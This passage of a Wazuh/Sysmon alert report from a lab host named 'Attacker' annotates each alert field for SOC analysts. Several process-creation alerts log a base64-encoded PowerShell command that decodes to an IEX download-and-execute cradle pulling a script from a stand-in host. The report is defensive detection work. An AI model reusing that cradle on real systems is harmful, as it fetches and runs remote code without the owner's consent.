Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535365.2762564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:03.3106068Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350595
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:01.682 ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ProcessId: 384 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c17e-680a-e90c-000000000e00} ParentProcessId: 17020 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:01.682
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c17e-680a-e90c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17020
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:06.368+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:06.368+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  126
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535366.2770627
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:03.7645310Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350596
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:03.676 ProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ProcessId: 384 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1 CreationUtcTime: 2025-04-24 22:56:03.676 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:03.676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k4xjswto.1mn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:03.676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:10.093+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:10.093+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  123
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535370.2773388
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:07.9049338Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350610
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:05.130 ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ProcessId: 15128 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c181-680a-eb0c-000000000e00} ParentProcessId: 384 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:05.130
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c181-680a-eb0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  384
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:10.096+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:10.096+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  127
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535370.2781451
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:08.2961603Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350611
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:08.275 ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ProcessId: 15128 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1 CreationUtcTime: 2025-04-24 22:56:08.275 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:08.275
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f1rrcy3r.32z.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:08.275
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:12.951+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:12.951+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  124
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535372.2784220
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

